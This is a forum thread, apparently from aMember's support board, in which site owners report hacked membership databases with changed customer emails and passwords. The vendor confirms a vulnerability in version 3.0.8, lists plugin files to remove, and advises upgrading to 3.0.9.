My amember payment system seem to have hacked. All the addresses of my customers have been changed to a fake one, and all the password were changed too. So my subscribers cannot access the paid site (because their password was changed), and whe they request their password to be sent to them them, they cannot receive it (because their email address was changed). I have contacted the support service about this emergency about 10 hours ago and I still have no answer. I am editing the subscribers data one by one and ending them a mail to inform them. This is a huge job! I have noticed that the email addesses are still kept in memory in "User Payments/Subscriptions" > Edit So I would like to know if there is a way to resset every email addresses automatically instead of manually one by one.
attack The same thing happened to my membership database yesterday - all the passwords were reset and the email addresses changed. Fortunately I had a back-up of the 6000 plus members but I would like to know how it happened and what can be done to stop this from happening again? dave AM version 2.4.1pro php version 4.4.0
Could you please let all of us know what the problem/resolution is? I'd rather not be hacked as well!
I'm sure the aMember group will have this resolved soon. Everyone who reads this prior to a solution being posted, should immediately perform a backup of the aMember tables and disallow changing the password and email fields. Keep an eye on your site and this thread for a posted solution. We'll all hope for quick and speedy one.
Yes, unfortunately, there is a confirmed security problem in 3.0.8. Please immediately remove file amember/plugins/payment/manual_cc/config.inc.php from your aMember installation. This problem only affects installations of 3.0.8 (and not earlier). It is only possible to break something if allow_url_fopen and allow_url_include (PHP 5.2+) are enabled in php.ini. In short, any default installation of PHP 5.2 is safe by default, earlier version of PHP are not protected by default. In any case, if you remove this file, you are OK. Once the file is removed, check you website access log for as long as possible for access to "plugins/payment/manual_cc/config.inc.php". If there was any access, please contact us via helpdesk. We will make an email notice to all customers today.
The problem is more serious than described previously. All customers of aMember must upgrade to 3.0.9 immediately. If upgrade is impossible to do right now, it is necessary to remove files amember/plugins/payment/paymenow/config.inc.php amember/plugins/payment/paymenow/paymenow.inc.php amember/plugins/payment/paypal_pro/paypal_pro.inc.php amember/plugins/payment/secpay/secpay.inc.php amember/plugins/payment/secpay/config.inc.php amember/plugins/payment/manual_cc/config.inc.php Not all installations are vunerable (it depends very much on PHP and server firewall configuration), but it is better to prevent attack.
Hi Alex, I have been waiting for an update since many months now. But it is nice to see that somethng happened in the area of an update. Well, I see no reason why people should have all those files in the installations anyway. Just delete all the files that you are not using it, i.e. payment plugins. I have deleted everything except a free plugin, since I am not using amember for payment. Not to have files is better than watching which files are vulneralbe and making a big list of what not to have.
thanks Grant. I finally figured out why the link Alex posted didn't work, the word Security was missing the "U". I can imagine with the rush to get to the bottom of the security issue and make sure it is fixed, he is quite busy, so I am not making a big deal out of it. I deleted the listed files, so hopefully that resolves the issue. I bought aMember because the other payment processing package I had been using was a big problem with security holes that were not being fixed. I am very pleased with the rapid response by aMember to this threat!
attacked? It looks as though I may have been attacked and the members table has been removed (no recent backups) Is it possible to retrieve anything or do I need to rebuild from scratch
You should send in a ticket to Alex. BTW- some hosts keep nightly backups, you might get lucky! David
Thank you. I got a backup from my host. My backup was corrupted - lesson learnt make 2 backups. Alex has been of great assitance in getting everything back on track. I have made the necessary security patches/changes